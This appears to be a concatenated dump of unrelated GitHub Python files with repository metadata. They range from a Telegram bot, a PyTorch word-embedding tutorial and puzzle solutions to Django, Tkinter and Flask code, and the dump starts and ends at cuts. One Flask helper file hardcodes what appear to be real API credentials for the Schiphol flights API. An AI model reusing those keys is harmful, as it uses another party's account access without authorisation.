cr.show_text(\"Last 7days %6s Views %03.2f EUR\" % (\n self.data['week'].get('rows')[0][0],\n float(self.data['week'].get('rows')[0][1])))\n\nif __name__ == '__main__':\n import signal\n signal.signal(signal.SIGINT, signal.SIG_DFL)\n MyWin()\n Gtk.main()\n\n# ex:ts=4:et:\n","repo_name":"lwindolf/ga-dashlet","sub_path":"ga-dashlet.py","file_name":"ga-dashlet.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"711707729","text":"import os\nimport csv\nimport datetime\n\nstates = {\n 'Utah' : 'UT' ,\n 'North Carolina' : 'NC' ,\n 'Arizona' : 'AZ' ,\n 'Virgin Islands' : 'VI' ,\n 'Kentucky' : 'KY' ,\n 'Minnesota' : 'MN' ,\n 'New Hampshire' : 'NH' ,\n 'Maine' : 'ME' ,\n 'Alaska' : 'AK' ,\n 'Texas' : 'TX' ,\n 'New York' : 'NY' ,\n 'Arkansas' : 'AR' ,\n 'Delaware' : 'DE' ,\n 'Indiana' : 'IN' ,\n 'New Jersey' : 'NJ' ,\n 'West Virginia' : 'WV' ,\n 'Wisconsin' : 'WI' ,\n 'Kansas' : 'KS' ,\n 'Alabama' : 'AL' ,\n 'Florida' : 'FL' ,\n 'Ohio' : 'OH' ,\n 'District of Columbia' : 'DC' ,\n 'California' : 'CA' ,\n 'Northern Mariana Islands' : 'MP' ,\n 'National' : 'NA' ,\n 'Georgia' : 'GA' ,\n 'Missouri' : 'MO' ,\n 'Vermont' : 'VT' ,\n 'Massachusetts' : 'MA' ,\n 'Oklahoma' : 'OK' ,\n 'South Carolina' : 'SC' ,\n 'Montana' : 'MT' ,\n 'Mississippi' : 'MS' ,\n 'North Dakota' : 'ND' ,\n 'Illinois' : 'IL' ,\n 'Puerto Rico' : 'PR' ,\n 'Nebraska' : 'NE' ,\n 'Pennsylvania' : 'PA' ,\n 'Oregon' : 'OR' ,\n 'Colorado' : 'CO' ,\n 'Guam' : 'GU' ,\n 'South Dakota' : 'SD' ,\n 'Washington' : 'WA' ,\n 'Virginia' : 'VA' ,\n 'Connecticut' : 'CT' ,\n 'Rhode Island' : 'RI' ,\n 'Hawaii' : 'HI' ,\n 'American Samoa' : 'AS' ,\n 'Michigan' : 'MI' ,\n 'Iowa' : 'IA' ,\n 'Idaho' : 'ID' ,\n 'Maryland' : 'MD' ,\n 'Wyoming' : 'WY' ,\n 'Louisiana' : 'LA' ,\n 'Tennessee' : 'TN' ,\n 'Nevada' : 'NV' ,\n 'New Mexico' : 'NM' \n}\n\ndef parse_a_row(row):\n #check for header and ignore it\n ID, Name, DOB, SSN, State = row\n if ID == 'Emp ID':\n return None\n #Name has format of : John Doe\n first_name, last_name = Name.split(' ')\n #DOB has format of YYYY-MM-DD\n # split YYYY, MM and DD, then use map to convert to integers, convert the result to a list\n #finally use * to feed the list to datetime.date element-wise\n dob = datetime.date( *list(map(int,DOB.split('-')) ) )\n #now convert dob to the desired format\n dob = dob.strftime(\"%m/%d/%y\")\n #hide first 5 numbers of sss and just grab las four\n ssn = '***-**-' + SSN.split('-')[-1]\n return ID, first_name, last_name, dob, ssn, states[State]\n\n#Get a list of all data files to read located in folder 'data'\nall_files = os.listdir('data')\n\n#Open an output file to gather our results\noutfile = open(os.path.join('output','new_records.csv'), 'w', newline='')\n#Add a csv writer\ncsv_writer = csv.writer(outfile, delimiter=',')\n#add header\ncsv_writer.writerow(['Emp ID', 'First Name', 'Last Name', 'DOB', 'SSN', 'State'])\n\n#Loop over all files to parse\nfor afile in all_files:\n #Need to add the path to file before we open it\n afile = os.path.join('data',afile)\n if afile.endswith('csv'):\n #Analyze file here\n with open(afile, 'r', newline='') as infile:\n csv_reader = csv.reader(infile, delimiter=',')\n for row in csv_reader:\n parsed_row = parse_a_row(row)\n #check for header here \n if parsed_row:\n csv_writer.writerow(parsed_row)\n#Close outpuf file\noutfile.close()\n","repo_name":"alandavila/python-challenge","sub_path":"PyBoss/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24283924772","text":"from telegram import Update\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, filters\nfrom telegram.ext import MessageHandler\nimport text_effects\nfrom dotenv import load_dotenv\nimport os\nimport random\n\nload_dotenv()\nTOKEN = os.environ[\"TOKEN\"]\n\n\nwith open(\"stopwords-ru.txt\") as f:\n STOP_WORDS = f.read().split()\nSTOP_WORDS = set(STOP_WORDS)\n\n\ndef hello(update: Update, context: CallbackContext) -> None:\n \"\"\"Greet user saying /hello\"\"\"\n update.message.reply_text(f\"Hello {update.effective_user.first_name}\")\n\n\ndef help(update: Update, context: CallbackContext) -> None:\n \"\"\"Description of all commands\"\"\"\n commands_with_descriptions = []\n for handler_list in updater.dispatcher.handlers.values():\n for handler in handler_list:\n if isinstance(handler, CommandHandler):\n command_repr = \"\\n\".join([\"/\" + comm for comm in handler.command])\n docstring = handler.callback.__doc__\n commands_with_descriptions.append(command_repr + \"\\n\" + text_effects.italics(docstring))\n delimiter = \"\\n\" + text_effects.bold(\"=\" * 32) + \"\\n\"\n update.message.reply_markdown_v2(delimiter.join(commands_with_descriptions))\n\n\ndef what_is(update: Update, context: CallbackContext) -> None:\n text: str = update.message.text\n word_to_choose_from = set(text.split()) - STOP_WORDS\n if len(word_to_choose_from) == 0:\n answer = \"В чем смысл жизни?\"\n else:\n word = random.choice(list(word_to_choose_from))\n answer = f\"Что такое {word}?\"\n update.message.reply_text(answer)\n\n\nupdater = Updater(token=TOKEN)\n\nupdater.dispatcher.add_handler(CommandHandler('hello', hello))\nupdater.dispatcher.add_handler(CommandHandler('help', help))\nupdater.dispatcher.add_handler(\n MessageHandler(\n filters=(filters.Filters.text & ~filters.Filters.command),\n callback=what_is\n )\n)\n\nupdater.start_polling()\nupdater.idle()\n","repo_name":"iakremnev/mkn_2022_python_bot","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"19730249828","text":"'''\npy3.5\npytorch0.4.1\n@smx\n\nC-BOW\nThe CBOW model is as follows. Given a target word wi and an N context window on each side, wi−1,…,wi−N and wi+1,…,wi+N,\n用周围的词wi-1,wi+1 预测中间的词wi\n'''\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\n\n# create your model and train. here are some functions to help you make\n# the data ready for use by your module\nclass CBOW(nn.Module):\n def __init__(self, vocab_size, embedding_dim, context_size):\n super(CBOW, self).__init__()\n self.embeddings = nn.Embedding(vocab_size, embedding_dim)\n self.linear1 = nn.Linear(context_size * embedding_dim, 128)\n self.linear2 = nn.Linear(128, vocab_size)\n\n def forward(self, inputs):\n embeds = self.embeddings(inputs).view((1, -1))\n out = F.relu(self.linear1(embeds))\n out = self.linear2(out)\n log_probs = F.log_softmax(out, dim=1)\n return log_probs\n\ndef make_context_vector(context, word_to_ix):\n idxs = [word_to_ix[w] for w in context]\n return torch.tensor(idxs, dtype=torch.long)\n\nEMBEDDING_DIM =10\nCONTEXT_SIZE = 4 # 2 words to the left, 2 to the right\nraw_text = \"\"\"We are about to study the idea of a computational process.\nComputational processes are abstract beings that inhabit computers.\nAs they evolve, processes manipulate other abstract things called data.\nThe evolution of a process is directed by a pattern of rules\ncalled a program. People create programs to direct processes. In effect,\nwe conjure the spirits of the computer with our spells.\"\"\".split()\n\n# By deriving a set from `raw_text`, we deduplicate the array\nvocab = set(raw_text)\nvocab_size = len(vocab)\n\nword_to_ix = {word: i for i, word in enumerate(vocab)}\nid_to_word = {word_to_ix[word]:word for word in word_to_ix}\ndata = []\nfor i in range(2, len(raw_text) - 2):\n context = [raw_text[i - 2], raw_text[i - 1],\n raw_text[i + 1], raw_text[i + 2]]\n target = raw_text[i]\n data.append((context, target))\nprint(data[:5])\n\n\nlosses = []\nloss_function = nn.NLLLoss()\nmodel = CBOW(len(vocab), EMBEDDING_DIM, CONTEXT_SIZE)\noptimizer = optim.SGD(model.parameters(), lr=0.1)\n\nfor epoch in range(10):\n total_loss = 0\n for context, target in data:\n\n # Step 1. Prepare the inputs to be passed to the model (i.e, turn the words\n # into integer indices and wrap them in tensors)\n context_idxs = torch.tensor([word_to_ix[w] for w in context], dtype=torch.long)\n\n # Step 2. Recall that torch *accumulates* gradients. Before passing in a\n # new instance, you need to zero out the gradients from the old\n # instance\n model.zero_grad()\n\n # Step 3. Run the forward pass, getting log probabilities over next\n # words\n log_probs = model(context_idxs)\n\n # Step 4. Compute your loss function. (Again, Torch wants the target\n # word wrapped in a tensor)\n loss = loss_function(log_probs, torch.tensor([word_to_ix[target]], dtype=torch.long))\n\n # Step 5. Do the backward pass and update the gradient\n loss.backward()\n optimizer.step()\n\n # Get the Python number from a 1-element Tensor by calling tensor.item()\n total_loss += loss.item()\n losses.append(total_loss)\nprint(losses) # The loss decreased every iteration over the training data!\n\ntest= ['We', 'are', 'to', 'study']\ninput = torch.tensor([word_to_ix[w] for w in test], dtype=torch.long)\nout = model(input)\nprint(out)\nmaxprob,prediclabel = torch.max(out, 1)\npredict_word = id_to_word[prediclabel.item()]\nprint(predict_word)","repo_name":"ShenMinXu/Pytorch-NLP-papers-implementation","sub_path":"pytorch-tutorial/WordEmbedding-CBOW.py","file_name":"WordEmbedding-CBOW.py","file_ext":"py","file_size_in_byte":3613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18303696939","text":"import os\nimport requests\nimport urllib.parse\n\nfrom flask import redirect, render_template, request, session\nfrom functools import wraps\n\n# Renders a picture of apology\ndef apology(message, code=400):\n def escape(s):\n \"\"\"\n Escape special characters.\n\n https://github.com/jacebrowning/memegen#special-characters\n \"\"\"\n for old, new in [(\"-\", \"--\"), (\" \", \"-\"), (\"_\", \"__\"), (\"?\", \"~q\"),\n (\"%\", \"~p\"), (\"#\", \"~h\"), (\"/\", \"~s\"), (\"\\\"\", \"''\")]:\n s = s.replace(old, new)\n return s\n return render_template(\"apology.html\", top=code, bottom=escape(message)), code\n\n\ndef log_req(f):\n \"\"\"\n Decorate routes to require login.\n\n https://flask.palletsprojects.com/en/1.1.x/patterns/viewdecorators/\n \"\"\"\n @wraps(f)\n def fun(*args, **kwargs):\n if session.get(\"user_id\") is None:\n return redirect(\"/login\")\n return f(*args, **kwargs)\n return fun\n\n\ndef lookup(symbol):\n \"\"\"Look up quote for city\"\"\"\n\n # Connect API\n try:\n headers_dict = {\"Accept\": \"application/json\", \"app_id\": \"adf587a8\", \"app_key\": \"e4fe059f048765a5a7527fa3f68910ff\", \"ResourceVersion\": \"v4\"}\n url = f\"https://api.schiphol.nl/public-flights/destinations/{urllib.parse.quote_plus(symbol)}\"\n \n\n\n response = requests.get(url, headers=headers_dict)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n \n try:\n get = response.json()\n return {\n \"city\": get[\"city\"]\n }\n except (KeyError, TypeError, ValueError):\n return None\n\n\ndef search(flight):\n\n # Connect API\n try:\n headers_dict = {\"Accept\": \"application/json\", \"app_id\": \"adf587a8\", \"app_key\": \"e4fe059f048765a5a7527fa3f68910ff\", \"ResourceVersion\": \"v4\"}\n url = f\"https://api.schiphol.nl/public-flights/flights?scheduleDate={urllib.parse.quote_plus(flight)}&includedelays=false\"\n\n\n response = requests.get(url, headers=headers_dict)\n response.raise_for_status()\n except requests.RequestException:\n return None\n\n # Specifying the return of the search\n try:\n get = response.json()\n return {\n \"flights\": get[\"flights\"]\n }\n except (KeyError, TypeError, ValueError):\n return None\n\n\ndef USD(value):\n return f\"${value:,.2f}\"\n","repo_name":"sezimy/Online-Flight-Booking-Web-Application","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21149746524","text":"class Solution:\n def containsNearbyDuplicate(self, nums: List[int], k: int) -> bool:\n # Time and Space Complexity: O(N)\n\n index = {}\n\n for i, num in enumerate(nums):\n if num in index and i - index[num] <= k:\n return True\n\n index[num] = i\n\n return False\n","repo_name":"nhatsmrt/AlgorithmPractice","sub_path":"LeetCode/219. Contains Duplicate II/Solution.py","file_name":"Solution.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"38429443037","text":"# Standard File import method\ninputfile = open('input.txt','r')\ninputtext = inputfile.read()\ninputfile.close()\n\n# --- Solution code --- \n\n\ndef processInputToSpreadsheet(input : str) -> list :\n return [[int(x) for x in line.split()] for line in input.splitlines()]\n \n\n# part 1\nexample = '''5 1 9 5\n7 5 3\n2 4 6 8'''\n\ndef calculateSpreadsheetChecksum(spreadsheet : list) -> int:\n sum = 0\n for line in spreadsheet:\n sum += max(line) - min(line) \n return sum\n\ndef solvePart1(input : str):\n print(calculateSpreadsheetChecksum(processInputToSpreadsheet(input)))\n\nsolvePart1(example)\nsolvePart1(inputtext)\n\n# part 2\n\nexample2 = '''5 9 2 8\n9 4 7 3\n3 8 6 5'''\n\ndef sumEvenlyDivisibleNumbers(spreadsheet : list) -> int:\n sum = 0\n for line in spreadsheet:\n for i in range(len(line)):\n for j in range(len(line)):\n if i != j:\n a = line[i]\n b = line[j]\n if (float(a//b) == a/b):\n sum += a//b\n return sum\n\ndef solvePart2(input : str):\n print(sumEvenlyDivisibleNumbers(processInputToSpreadsheet(input)))\n\nsolvePart2(example2)\nsolvePart2(inputtext)","repo_name":"Mezz-Davies/AdventOfCode","sub_path":"2017/2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1180,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31247673127","text":"from scipy.optimize import brentq\n\n# Local application/library specific imports\nfrom py_vollib.ref_python.black_scholes_merton import black_scholes_merton\n\n\n# -----------------------------------------------------------------------------\n# FUNCTIONS\n\ndef implied_volatility(price, S, K, t, r, q, flag):\n \"\"\"Calculate the Black-Scholes-Merton implied volatility.\n\n :param S: underlying asset price\n :type S: float\n :param K: strike price\n :type K: float\n :param sigma: annualized standard deviation, or volatility\n :type sigma: float\n :param t: time to expiration in years\n :type t: float\n :param r: risk-free interest rate\n :type r: float\n :param q: annualized continuous dividend rate\n :type q: float\n :param flag: 'c' or 'p' for call or put.\n :type flag: str\n\n >>> S = 100\n >>> K = 100\n >>> sigma = .2\n >>> r = .01\n >>> flag = 'c'\n >>> t = .5\n >>> q = .02\n\n >>> price = black_scholes_merton(flag, S, K, t, r, sigma, q)\n >>> implied_volatility(price, S, K, t, r, q, flag)\n 0.20000000000000018\n\n >>> flac = 'p'\n >>> sigma = 0.3\n >>> price = black_scholes_merton(flag, S, K, t, r, sigma, q)\n >>> price\n 8.138101080183894\n >>> implied_volatility(price, S, K, t, r, q, flag)\n 0.30000000000000027\n \"\"\"\n\n f = lambda sigma: price - black_scholes_merton(flag, S, K, t, r, sigma, q)\n\n return brentq(\n f,\n a=1e-12,\n b=100,\n xtol=1e-15,\n rtol=1e-15,\n maxiter=1000,\n full_output=False\n )\n\n\nif __name__ == \"__main__\":\n from py_vollib.helpers.doctest_helper import run_doctest\n run_doctest()\n","repo_name":"vollib/py_vollib","sub_path":"py_vollib/ref_python/black_scholes_merton/implied_volatility.py","file_name":"implied_volatility.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":240,"dataset":"github-code","pt":"37"} +{"seq_id":"19309671016","text":"\ndef es_num(car):\n return car in '0123456789'\n\ndef test():\n \n # Punto 1\n # contenido = 'Argentina ganó 2 mundiales en 1978 y en 1986 y un2o3 un2.'\n cd = 0\n p_dos_d = 0\n\n # Punto 2\n # contenido = 'Las laderas de las montañas están labradas.'\n es_primera = True\n es_l = False\n es_la = False\n p_com_la = 0\n \n #Punto 3\n promedio = 0\n cd_con_la = 0\n cl = 0\n\n # Punto 4\n contenido = 'Las lluvias se llevaron los llantos.'\n es_ll = False\n es_v = False\n p_com_ll_t_v = 0\n\n for car in contenido:\n if car == ' ' or car == '.':\n \n if cd >= 2:\n p_dos_d += 1\n \n if es_la:\n p_com_la += 1\n cd_con_la += cl\n\n if es_ll and es_v:\n p_com_ll_t_v += 1\n\n es_primera = True\n es_la = False\n es_ll = False\n es_l = False\n es_v = False\n cd = 0\n cl = 0\n\n else:\n\n if es_num(car):\n cd += 1\n \n print(cd)\n\n if es_primera and (car == 'l' or car == 'L'):\n es_l = True\n es_primera = False\n elif es_l and car == 'a':\n es_la = True\n es_l = False\n elif es_l and car == 'l':\n es_ll = True\n es_l = False\n\n if car == 'v':\n es_v = True\n\n cl += 1\n\n \n print('La cantidad de palabras con al menos dos digiros son: ', p_dos_d)\n print('La cantidad de palabras que comienzan con la son: ', p_com_la)\n if p_com_la != 0:\n print('El promedio de las letras de las palabras que cumplieron el comenzar con la: ',cd_con_la/p_com_la)\n print('La cantidad de palabras que comenzaron con ll:', p_com_ll_t_v) \n\nif __name__ == '__main__':\n test()\n\n\n","repo_name":"franAndrad/python-src","sub_path":"clases/f13_e5.py","file_name":"f13_e5.py","file_ext":"py","file_size_in_byte":1893,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"18668278088","text":"from django.contrib import admin\nfrom mainapp.models import ProductCategory, Product\n\n\n# Register your models here.\n\n\n@admin.register(Product)\nclass ProductAdmin(admin.ModelAdmin):\n list_display = ('name', 'category', 'price', 'quantity')\n search_fields = ('name', 'category__name')\n ordering = ('quantity', 'price')\n fields = ('name', 'description', 'category', 'image', ('price', 'quantity'))\n\n\n@admin.register(ProductCategory)\nclass ProductCategoryAdmin(admin.ModelAdmin):\n search_fields = ('name',)\n ordering = ('name',)\n","repo_name":"Kllraz/geekshop","sub_path":"mainapp/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22088863352","text":"\"\"\"Tests for main.py.\"\"\"\n\n# System Imports\nimport logging\n\n# Relative Imports\nimport pytest\nfrom solver import reduce_from_answer, reduce_from_feedback, solve\n\n\n@pytest.mark.parametrize(\n \"candidate, answer, word_list, reduced_list\",\n [\n (\"drink\", \"spoon\", [\"blink\", \"snoop\", \"raven\"], [\"snoop\"]),\n (\"drink\", \"spoon\", [\"snoop\", \"spool\"], [\"snoop\"]),\n (\"coded\", \"spoon\", [\"snoop\", \"speak\"], [\"snoop\"]),\n (\"spoon\", \"chore\", [\"clock\", \"crook\", \"prawn\"], [\"clock\"]),\n (\"abfgc\", \"abcde\", [\"cdabc\", \"abfgh\", \"abjck\"], [\"abjck\"]),\n ],\n)\ndef test_reduce_from_answer(caplog, candidate, answer, word_list, reduced_list):\n \"\"\"Test reduce_from_answer works as expected.\"\"\"\n\n # Set the logger capture level for debugging.\n caplog.set_level(logging.DEBUG)\n\n # Given - Parameterised Inputs\n\n # When\n _reduced_list = reduce_from_answer(candidate, answer, word_list)\n\n # Then\n assert _reduced_list == reduced_list\n\n\ndef test_reduce_from_feedback():\n \"\"\"Test reduce_from_feedback function works as expected.\"\"\"\n\n # Given\n words = [\"could\", \"moult\", \"would\", \"wound\", \"young\", \"youth\"]\n\n # When\n reduced_words = reduce_from_feedback(\"nobly\", \"_G_G_\", words)\n\n # Then\n assert reduced_words == [\"could\", \"moult\", \"would\"]\n\n\n@pytest.mark.parametrize(\n \"guesses,feedback\",\n [\n ([\"raise\", \"nobly\", \"could\"], [\"_____\", \"_G_G_\", \"GGGGG\"]),\n (\n [\"raise\", \"deter\", \"lower\", \"bluer\", \"ulcer\"],\n [\"y___y\", \"___GG\", \"Y__GG\", \"_GYGG\", \"GGGGG\"],\n ),\n ],\n)\ndef test_solve(caplog, guesses, feedback):\n \"\"\"Test solve function works as expected.\"\"\"\n\n # Set the logger capture level for debugging.\n caplog.set_level(logging.DEBUG)\n\n # Setup\n with open(\"../../five_letter_words.txt\", \"r\") as f:\n words = f.read().splitlines()\n\n for i, (guess, feedback) in enumerate(zip(guesses, feedback)):\n\n words = reduce_from_feedback(guess, feedback.upper(), words)\n top_guess = list(solve(words, 1).keys())[0]\n\n try:\n assert guesses[i + 1] == top_guess\n except IndexError:\n pass\n\n assert len(words) == 1\n","repo_name":"harry-optimised/wordle_solver","sub_path":"src/wordle_solver/test_solve.py","file_name":"test_solve.py","file_ext":"py","file_size_in_byte":2173,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"16293161419","text":"import struct\nfrom mint import *\n\n@actor\ndef _():\n a.send('\\xff', b.mac)\n elapse(200)\n a.send('\\xfe', b.mac)\n\n@actor\ndef _():\n elapse(80)\n b.send('\\x81', a.mac)\n\na, b, c = Host(), Host(), Host()\nswitch = Switch()\nlink(a, switch.tips[0])\nlink(b, switch.tips[1])\nlink(c, switch.tips[2])\n\nrun(gui=True, until=341)\n","repo_name":"fans656/mint-dev","sub_path":"mint/_versions/20151130184549 gui switch with frame animation/main 3host 1switch.py","file_name":"main 3host 1switch.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"666803402","text":"import pandas as pd\n\ndadosUc = pd.read_csv('materias.csv')\n\n#print(dadosUc)\n\n\nfor indice, coluna in dadosUc.iterrows():\n if indice['Termo'] == 1 or indice['Termo'] == 2:\n print (indice['Nome da UC'])\n\n","repo_name":"aamgoulart/unifesp","sub_path":"PCOMP2019-1/leitura.py","file_name":"leitura.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21390291779","text":"#Riley Roberts\r\n#CSCI Assignment 10\r\n#12/18/2014\r\n#This program takes a multiply recursive function and draws it over and over\r\n#to make a cool 'spiky wheel' shape. \r\n\r\nimport turtle, random\r\n\r\n\r\na = turtle.Turtle()\r\nb = turtle.Turtle()\r\nc = turtle.Turtle()\r\nd = turtle.Turtle() #Making all the turtles\r\ne = turtle.Turtle()\r\nf = turtle.Turtle()\r\n\r\nwn = turtle.Screen() #Screen\r\nwn.tracer(0) #Turn on tracer if you don't want to wait \r\na.shape(\"turtle\")\r\nb.shape(\"turtle\")\r\nc.shape(\"turtle\")\r\nd.shape(\"turtle\")\r\ne.shape(\"turtle\") #Turtles are turtle shaped :D\r\nf.shape(\"turtle\") \r\n\r\na.speed(0)\r\nb.speed(0)\r\nc.speed(0)\r\nd.speed(0)\r\ne.speed(0) #Speeds\r\nf.speed(0)\r\n\r\na.penup()\r\nb.penup()\r\nc.penup()\r\nd.up() #All pens up\r\ne.up()\r\nf.up()\r\n\r\na.goto(-200, 250)\r\nb.goto(-200, 0) #Their starting positions\r\nc.goto(-200, -250)\r\nd.goto(200, 250)\r\ne.goto(200, 0)\r\nf.goto(200, -250)\r\n\r\nd.setheading(180)\r\ne.setheading(180) #Turtles on right look inward\r\nf.setheading(180)\r\n\r\ndef recursiveObject(length, t):\r\n t.pendown() \r\n if length > 20:\r\n t.tilt(40) \r\n t.forward(length/2)\r\n t.right(5)\r\n t.forward(length/2)\r\n recursiveObject(length-15,t) #The super awesome recursive line with 'sharp' points\r\n R = random.random()\r\n B = random.random()\r\n G = random.random() #Random colors\r\n t.color(R, B, G) \r\n t.left(length/2) #Can be 3\r\n recursiveObject(length-20,t)\r\n t.backward(length/2)\r\n recursiveObject(length-15, t)\r\n\r\n\r\ndef myDrawing(length, t, levels):\r\n for i in range(51):\r\n if levels <= 7:\r\n recursiveObject(length, t) #This function calls the recursive shape\r\n levels = levels - 1 #When levels are lower, makes different shapes\r\n elif levels <= 5: \r\n recursiveObject(length-2, t)\r\n levels = levels - 1\r\n else:\r\n recursiveObject(length-4, t)\r\n\r\n t.ht() \r\n \r\n\r\nmyDrawing(70, a, 8)\r\nmyDrawing(70, b, 8)\r\nmyDrawing(70, c, 8) #All turtles are called!\r\nmyDrawing(70, d, 8)\r\nmyDrawing(70, e, 8)\r\nmyDrawing(70, f, 8) \r\n","repo_name":"Risauce/Pre2015Code","sub_path":"HighSchool/Old Assignment 10.py","file_name":"Old Assignment 10.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"73209674986","text":"import os\nimport tkinter\nfrom tkinter import Tk \nfrom tkinter import filedialog\nimport io\nfrom io import*\nfrom Analizador_Ventas import *\nfrom Mes import *\nfrom Producto import *\nfrom Reporte import *\nventas = Analizador_Ventas()\nDatos = \"\"\n\ndef Menu():\n opcion = True \n \n while opcion :\n \n print(\"**** Funciones del Sistema ****\")\n print(\"** Elija una opción **\")\n print(\"1. Cargar Datos\")\n print(\"2. Cargar Instrucciones\")\n print(\"3. Analizar\")\n print(\"4. Reportes\")\n print(\"5. Salir\")\n opcion = input (\"\")\n if opcion == \"1\" :\n print(\"\")\n print(\"---------- Data Cargada -----------\")\n Ventana_CargarVentas()\n \n print(\"\")\n\n elif opcion == \"2\" :\n print(\"\")\n print(\"--------- Instrucciones Cargadas ----------\")\n Ventana_CargarInstrucciones()\n print(\"\")\n\n elif opcion == \"3\" :\n print(\"\")\n print(\"---------- Análisis Hecho ----------\")\n global Datos\n #print(Datos)\n ventas.analizador_ventas(Datos)\n print(\"\")\n\n elif opcion == \"4\" :\n print(\"\")\n print(\"Reportes hechos\")\n Reporte()\n print(\"\")\n\n elif opcion == \"5\" :\n print(\"Gracias, vuelve pronto :)\")\n opcion = False\n \n else:\n input(\"Ingrese una opción válida :)\")\n print(\"\")\n\ndef Ventana_CargarVentas():\n archivo = filedialog.askopenfilename(initialdir = \"/\") \n ventas_upload = open(archivo ,'r',encoding =\"utf8\")\n read = ventas_upload.read()\n ventas_upload.close()\n global Datos\n Datos = read\n print(Datos)\n \n\ndef Ventana_CargarInstrucciones():\n archivo = filedialog.askopenfilename(initialdir = \"/\")\n instrucciones_upload = open(archivo, 'r',encoding = \"utf8\")\n read = instrucciones_upload.read()\n instrucciones_upload.close()\n print(read)\n\n\nif __name__ == \"__main__\":\n Menu()\n\n\n\n \n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"Leonel1098/LFP_PR_201709088","sub_path":"Practica1/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2073,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21167516832","text":"from django.conf.urls import patterns, include, url\n\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n # Examples:\n # url(r'^$', 'blog.views.home', name='home'),\n url(r'^sblog/', include('sblog.urls')),\n url(r'^comments/', include('django.contrib.comments.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n)\n","repo_name":"m8k7j/mysite","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25462233636","text":"###\n#/***************************************************\n#File Name: gui.py\n#Version/Date: 1.0 (2020-05-13)\n#Programmer/ID: Raven Lim Zhe Xuan (1191101213)\n#Project Name: Smart Finance Manager \n#Teammates: Nagaindran A/L Kanaseelanayagam, Raja Muhammad Darwisy bin Raja Ahmad, Fong Zheng Wei\n#Course/Term: PSP0201 Mini IT Project (2019/20 T3)\n#***************************************************/\n###\nfrom tkinter import Frame, Label, Button, Canvas, PhotoImage\nfrom PIL import Image, ImageTk\nimport constants as Constants\nimport functions as Functions\n\nimport gui_planner as GUI_Planner\nimport gui_account as GUI_Account\nimport gui_investment as GUI_Investment\n\n# GUI\n# 1. EmptyWindow\n# 2. Set widgets\n# 3. AppendListToWidgets\n# 4. Place/pack widgets\n \n\nclass GUI(Frame):\n\n currentWindow = None\n currentSubWindow = None\n\n def __init__(self, Main, root = None, window: str = Constants.mainWindow):\n super().__init__(root)\n self.root = root\n self.Main = Main\n\n def Raise(exception):\n raise exception\n Functions.Switch([Constants.mainWindow, Constants.warningWindow, Constants.queryWindow], \n [self.InitMainWindow, self.InitWarnWindow, self.InitQueryWindow, \n lambda: Raise(Exception(\"No such window exists\")) ], window)\n \n \n# Window Functions\n def GetCurrentWindow(self) -> str:\n if (self.currentSubWindow is not None):\n return self.currentWindow + \" - \" + self.currentSubWindow\n else:\n return self.currentWindow\n\n def HideLastWindow(self):\n global container\n\n def SetContainer(frame: Frame):\n global container\n container = frame\n\n Functions.Switch(\n [Constants.mainWindow, Constants.warningWindow, Constants.queryWindow],\n [lambda: Functions.Switch( \n [Constants.mainMenuSub, Constants.plannerSub, Constants.accountSub, Constants.investmentSub],\n [ lambda: SetContainer(self.mainMenuFrame), \n lambda: SetContainer(self.plannerFrame), \n lambda: SetContainer(self.accountFrame), \n lambda: SetContainer(self.investmentFrame), \n lambda: SetContainer(None)], self.currentSubWindow\n ), \n lambda: print(None), lambda: print(None), \n lambda: print(\"Non existent\")], self.currentWindow\n )\n\n if (container is not None):\n container.pack_forget()\n\n\n# Main windows\n def InitQueryWindow(self):\n\n pass\n\n def InitWarnWindow(self):\n self.root.title(Constants.warningDisplayTitle)\n self.root.geometry(Constants.warningWindowSize)\n self.root.resizable(False, False)\n self.configure(background = Constants.warningWindowBgColor)\n self.pack(fill = \"both\" , expand = 1)\n \n def InitMainWindow(self):\n self.root.title(Constants.mainDisplayTitle)\n self.root.geometry(Constants.mainWindowSize)\n 